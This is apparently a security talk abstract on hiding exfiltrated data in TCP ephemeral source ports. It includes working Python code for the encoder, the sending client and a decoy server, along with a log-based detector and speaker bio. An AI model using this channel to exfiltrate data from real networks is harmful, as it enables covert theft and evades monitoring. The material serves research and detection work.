Knock, Knock - Abusing Ephemeral Ports for Data Exfil and C2

Hubert Lin

This study discusses a covert channel technique that leverages the ephemeral (source) ports of TCP connections, first to perform a non-traditional form of port knocking and then to exfiltrate data covertly from a client in a strictly firewalled environment to a remote web server. In this technique, an attacker uses the source port field of the TCP header to encode and transmit data: instead of letting the operating system choose the ephemeral port, the client binds each outbound connection to a source port whose value carries a few bits of the payload. Because ephemeral ports are normally assigned randomly by the operating system and change for each new connection, a source port that differs on every connection looks unremarkable, which makes the covert channel difficult for security measures to detect. Proof-of-concept (PoC) programs are available to demonstrate how file exfiltration can be achieved through the abuse of ephemeral ports. It is recommended to run a dummy web server listening on the destination port on the server, although this is not strictly necessary, because the encoded value has already been transmitted in the source port of the SYN by the time the connection is established. Once the client establishes a connection, it sends a request mimicking a software version check.

Current security measures, such as firewalls and intrusion detection systems, are not designed to detect this type of covert channel. Firewalls typically enforce policy on the destination port and track the source port only as part of connection state, never as a field that might carry data, while intrusion detection systems usually match known attack signatures rather than analyzing the source port field in TCP headers. The source port is nevertheless recorded in firewall, NetFlow and proxy logs, so the practical starting point for a detection is the statistical analysis of those logs: a client that opens many short-lived connections to one destination, each carrying the same small request, with source ports that do not spread over the operating system's ephemeral range the way OS-assigned ports would. This technique presents a significant threat to network security, as it can be used to exfiltrate sensitive information without detection, highlighting the need to develop new security measures that can detect and prevent this type of covert channel.
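The technique end to end, as an added example that is not part of the talk or its PoC programs: an encoder that maps bytes to source ports, the client that pins those ports with bind() and sends the decoy version check, the dummy server that reads the port back, and a log-based detector of the kind the previous paragraph calls for. The Linux default ephemeral range 32768-60999, the two marker ports 60000 and 60001 used as the knock, the encoding of one payload byte plus a 6-bit sequence counter per connection, the `/version` decoy path, the `updates.example` host name and the connection log are all choices made for this example, not details from the talk.

```python
"""Source-port covert channel: encoder, decoder, loopback demo and a log-based detector."""
import socket
import threading
from collections import defaultdict

PORT_LO, PORT_HI = 32768, 60999         # Linux default ip_local_port_range (assumption)
KNOCK_START, KNOCK_END = 60000, 60001   # marker ports chosen for this example; inside the range
SEQ_MASK = 0x3F                         # 6-bit sequence counter + 8 data bits = 14 bits per connection

def encode_ports(data: bytes) -> list:
    """One byte per TCP connection: port = PORT_LO + (seq << 8 | byte), bracketed by the knock."""
    body = [PORT_LO + ((i & SEQ_MASK) << 8 | b) for i, b in enumerate(data)]
    return [KNOCK_START, *body, KNOCK_END]

def decode_ports(ports: list) -> bytes:
    """Recover the payload from the source ports seen at the server; noise before the knock is ignored."""
    start = ports.index(KNOCK_START)
    end = ports.index(KNOCK_END, start)
    out = bytearray()
    for i, port in enumerate(ports[start + 1:end]):
        value = port - PORT_LO
        if value >> 8 != (i & SEQ_MASK):
            raise ValueError(f"sequence gap at connection {i}: a connection was dropped or reordered")
        out.append(value & 0xFF)
    return bytes(out)

def send_ports(ports, dst, request=b"GET /version HTTP/1.0\r\nHost: updates.example\r\n\r\n"):
    """Client side: one short-lived connection per port; bind() pins the source port the OS would pick."""
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind(("", port))
            s.connect(dst)
            s.sendall(request)   # decoy version check; the covert byte already left in the SYN
            s.recv(1024)         # wait for the reply so the server side closes first

def serve_ports(listener, count):
    """Dummy web server: answer each decoy request and record the client's source port."""
    seen = []
    for _ in range(count):
        conn, (_addr, sport) = listener.accept()
        with conn:
            conn.recv(1024)
            conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: 2\r\n\r\nok")
        seen.append(sport)
    return seen

BINS, CHI2_CRIT = 4, 16.27   # chi-square critical value, 3 degrees of freedom, p = 0.001
MIN_CONNS = 20               # fewer connections than this cannot support a verdict

def chi_square_vs_uniform(ports):
    """Distance of the observed source ports from a uniform spread over the OS ephemeral range."""
    width = (PORT_HI - PORT_LO + 1) / BINS
    counts = [0] * BINS
    for p in ports:
        counts[max(0, min(int((p - PORT_LO) / width), BINS - 1))] += 1
    expected = len(ports) / BINS
    return sum((c - expected) ** 2 / expected for c in counts)

def find_suspects(log_lines):
    """Group 'ts src sport dst dport' lines per client and destination; flag skewed or out-of-range ports."""
    flows = defaultdict(list)
    for line in log_lines:
        _ts, src, sport, dst, dport = line.split()
        flows[(src, dst, int(dport))].append(int(sport))
    suspects = {}
    for key, ports in flows.items():
        if len(ports) < MIN_CONNS:
            continue
        out_of_range = sum(1 for p in ports if not PORT_LO <= p <= PORT_HI)
        chi2 = chi_square_vs_uniform(ports)
        if out_of_range or chi2 > CHI2_CRIT:
            suspects[key] = {"connections": len(ports), "chi2": round(chi2, 1), "out_of_range": out_of_range}
    return suspects

PAYLOAD = b"constructed-secret: db_password=Tr0ub4dor&3 host=db01"   # constructed sample data

def constructed_log():
    """Constructed log: a benign client whose ports spread over the whole range, and a covert one."""
    benign = [PORT_LO + (i * 7919) % (PORT_HI - PORT_LO + 1) for i in range(40)]
    lines = [f"1700000000 10.0.0.5 {p} 203.0.113.10 443" for p in benign]
    lines += [f"1700000000 10.0.0.7 {p} 198.51.100.20 80" for p in encode_ports(PAYLOAD)]
    return lines

if __name__ == "__main__":
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))   # any free loopback port stands in for the attacker's web server
    listener.listen(8)
    ports = encode_ports(PAYLOAD)
    seen = []
    server = threading.Thread(target=lambda: seen.extend(serve_ports(listener, len(ports))))
    server.start()
    send_ports(ports, listener.getsockname())
    server.join()
    listener.close()
    print("server recovered:", decode_ports(seen))
    print("suspects:", find_suspects(constructed_log()))
```

Running the file performs the exchange over loopback and then runs the detector over the constructed log. Two points worth noticing: the sequence counter is not only an integrity check, it also keeps the source ports of any message shorter than 64 bytes distinct, so the client never has to rebind a port that is still in TIME_WAIT; and the chi-square test only catches this naive encoding, whose 14-bit values cannot reach the upper part of the range. An attacker can whiten the values across the whole range, so the connection rate per destination and the identical decoy request on every connection are the signals that survive.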

Speaker's Bio

Hubert Lin is a seasoned professional in the field of offensive security, specializing in exploiting and detecting vulnerabilities in remote systems, deploying honeypots, and conducting penetration testing. He has previously held positions as a team lead in signature development, evaluating network IPS effectiveness, and as a senior staff engineer on a Red Team, roles within renowned organizations in which he contributed to enhancing corporate security posture. Hubert also holds the Red Hat Certified Engineer (RHCE) and Offensive Security Certified Professional (OSCP) certifications. He is currently employed at Netskope, where he remains dedicated to advancing offensive security methodologies and techniques.